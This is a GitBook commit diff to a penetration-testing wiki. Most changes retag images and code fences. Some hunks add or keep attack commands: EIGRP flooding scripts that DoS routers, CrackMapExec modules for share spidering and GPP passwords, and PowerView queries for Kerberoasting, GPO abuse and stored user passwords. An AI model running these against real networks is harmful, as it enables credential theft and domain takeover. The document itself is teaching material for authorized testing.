GitBook: [#3572] No subject

generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md

@@ -105,7 +105,7 @@ Thus, after establishing the neighborhood, we know about the existence of these
 
 **I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **It’s caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually I’ll rewrite the script in C.**
 
-<figure><img src="../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
 
 Arguments of the script:
 
@@ -173,7 +173,7 @@ Script arguments:
 
 The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
 
-<figure><img src="../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
 
 Script arguments
 
@@ -187,7 +187,7 @@ in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --sr
 
 After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
 
-<figure><img src="../../.gitbook/assets/image (4) (1).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
 
 <figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure>
 

network-services-pentesting/8089-splunkd.md

@@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe
 
 The next step is to choose `Install app from file` and upload the application.
 
-<figure><img src="../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (37).png" alt=""><figcaption></figcaption></figure>
 
 Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
 

network-services-pentesting/pentesting-smb.md

@@ -307,6 +307,13 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
 sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
 ```
 
+Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
+
+{% hint style="info" %}
+The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
+You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.
+{% endhint %}
+
 ## Read Registry
 
 You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:

windows-hardening/active-directory-methodology/README.md

@@ -225,24 +225,9 @@ If you have managed to enumerate the active directory you will have **more email
 
 ### **Looks for Creds in Computer Shares**
 
-Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).\
-You can get help from automatic tools such as:
+Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).
 
-* [**Snaffler**](https://github.com/SnaffCon/Snaffler)****
-
-```bash
-Snaffler.exe -s -d domain.local -o snaffler.log -v data
-```
-
-* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
-  * `-M spider_plus [--share <share_name>]`
-  * `--pattern txt`
-
-```bash
-sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
-```
-
-Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy.
+****[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb.md#domain-shared-folders-search)****
 
 ### Steal NTLM Creds
 

windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md

@@ -493,7 +493,7 @@ Then, we change back the `userPrincipalName` of `Jane` to be something else, lik
 
 Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate.
 
-<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
 
 ## Weak Certificate Mappings - ESC10
 
@@ -538,7 +538,7 @@ Notice that the `userPrincipalName` in the certificate is `Administrator`.
 
 Then, we change back the `userPrincipalName` of `Jane` to be something else, like her original `userPrincipalName` `Jane@corp.local`.
 
-<figure><img src="../../../.gitbook/assets/image (4) (1) (2).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
 
 Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate.
 

windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md

@@ -83,7 +83,7 @@ In the previous flow it was used the trust hash instead of the **clear text pass
 
 The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’:
 
-![](<../../.gitbook/assets/image (2) (1) (2).png>)
+![](<../../.gitbook/assets/image (2) (1).png>)
 
 Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
 

windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md

@@ -104,7 +104,7 @@ netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP lo
 
 Now establish the session, which will forward us to **the first server**.
 
-<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
 
 #### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
 
@@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
 
 Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
 
-<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (41).png" alt=""><figcaption></figcaption></figure>
 
 ### OpenSSH <a href="#openssh" id="openssh"></a>
 
@@ -136,11 +136,11 @@ Download the latest [OpenSSH Release zip from github](https://github.com/PowerSh
 
 Uncompress the zip to where you’d like. Then, run the install script - `Install-sshd.ps1`
 
-<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (38).png" alt=""><figcaption></figcaption></figure>
 
 Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
 
-<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
 
 If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.
 

windows-hardening/basic-powershell-for-pentesters/powerview.md

@@ -18,7 +18,7 @@ The most up-to-date version of PowerView will always be in the dev branch of Pow
 
 ### Quick enumeration
 
-```bash
+```powershell
 Get-NetDomain #Basic domain info
 #User info
 Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
@@ -51,7 +51,7 @@ Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, Active
 
 ### Domain info
 
-```bash
+```powershell
 # Domain Info
 Get-Domain #Get info about the current domain
 Get-NetDomain #Get info about the current domain
@@ -76,7 +76,7 @@ Get-ForestDomain
 
 ### Users, Groups, Computers & OUs
 
-```bash
+```powershell
 # Users
 ## Get usernames and their groups
 Get-DomainUser -Properties name, MemberOf | fl
@@ -105,6 +105,9 @@ Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marke
 Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
     ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
 }
+# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
+## Users with this flag might have empty passwords (if allowed) or shorter passwords
+Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
 
 #Groups
 Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
@@ -141,7 +144,7 @@ Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers in
 
 ### Logon and Sessions
 
-```bash
+```powershell
 Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
 Get-NetSession -ComputerName <servername> #Get active sessions on the host
 Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS))
@@ -149,12 +152,14 @@ Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admi
 Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
 ```
 
-### GPOs
+### Group Policy Object - GPOs
 
-```bash
+If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
+For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse.md#gpo-delegation).
+
+```powershell
 #GPO
-Get-DomainGPO | select displayName
-## Get-DomainGPO and Get-NetGPO are similar
+Get-DomainGPO | select displayName #Check the names for info
 Get-NetGPO #Get all policies with details
 Get-NetGPO | select displayname #Get the names of the policies
 Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer
@@ -166,6 +171,13 @@ Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io"
 # Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights
 Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
 
+# Get permissions a user/group has over any GPO
+$sid=Convert-NameToSid "Domain Users"
+Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
+
+# COnvert GPO GUID to name
+Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532
+
 # Transform SID to name
 ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126
 
@@ -187,7 +199,7 @@ Learn how to **exploit permissions over GPOs and ACLs** in:
 
 ### ACL
 
-```bash
+```powershell
 #Get ACLs of an object (permissions of other objects over the indicated one)
 Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs
 
@@ -210,7 +222,7 @@ Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "f
 
 ### Shared files and folders
 
-```bash
+```powershell
 Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
 Find-DomainShare -CheckShareAccess #Search readable shares
 Find-InterestingDomainShareFile #Find interesting files, can use filters
@@ -218,7 +230,7 @@ Find-InterestingDomainShareFile #Find interesting files, can use filters
 
 ### Domain Trust
 
-```bash
+```powershell
 Get-NetDomainTrust #Get all domain trusts (parent, children and external)
 Get-DomainTrust #Same
 Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
@@ -237,7 +249,7 @@ Get-DomainForeignGroupMember #Get groups with privileges in other domains inside
 
 ### L**ow**-**hanging fruit**
 
-```bash
+```powershell
 #Check if any user passwords are set
 $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
 
@@ -277,7 +289,7 @@ Invoke-UserHunter -Stealth
 
 ### Deleted objects
 
-```bash
+```powershell
 #This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
 #You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
 Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
@@ -287,19 +299,19 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
 
 #### SID to Name
 
-```bash
+```powershell
 "S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
 ```
 
 #### Kerberoast
 
-```bash
+```powershell
 Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
 ```
 
 #### Use different credentials (argument)
 
-```bash
+```powershell
 # use an alterate creadential for any function
 $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
 $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
@@ -308,7 +320,7 @@ Get-DomainUser -Credential $Cred
 
 #### Impersonate a user
 
-```bash
+```powershell
 # if running in -sta mode, impersonate another credential a la "runas /netonly"
 $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
 $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
@@ -319,7 +331,7 @@ Invoke-RevertToSelf
 
 #### Set values
 
-```bash
+```powershell
 # set the specified property for the given user identity
 Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
 # Set the owner of 'dfm' in the current domain to 'harmj0y'

windows-hardening/lateral-movement/dcom-exec.md

@@ -34,12 +34,12 @@ It is then possible to invoke the `ExecuteShellCommand` method to start a proces
 
 The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access:
 
-![](<../../.gitbook/assets/image (4) (1) (2) (1).png>)
+![](<../../.gitbook/assets/image (4) (1) (2).png>)
 
 You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\
 Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)’s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`:
 
-![](<../../.gitbook/assets/image (3) (1) (1) (2).png>)
+![](<../../.gitbook/assets/image (3) (1) (1).png>)
 
 Another way to identify potential target objects is to look for the value `LaunchPermission` missing from keys in `HKCR:\AppID\{guid}`. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format:
 

windows-hardening/windows-local-privilege-escalation/README.md

@@ -1154,6 +1154,12 @@ Search in `C:\ProgramData\Microsoft\Group Policy\history` or in _**C:\Documents
 gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
 ```
 
+Using crackmapexec to get the passwords:
+
+```shell-session
+crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
+```
+
 ### IIS Web Config
 
 ```bash

windows-hardening/windows-local-privilege-escalation/juicypotato.md

@@ -115,7 +115,7 @@ c:\Users\Public>
 
 ### Launch a new CMD (if you have RDP access)
 
-![](<../../.gitbook/assets/image (37).png>)
+![](<../../.gitbook/assets/image (37) (1).png>)
 
 ## CLSID Problems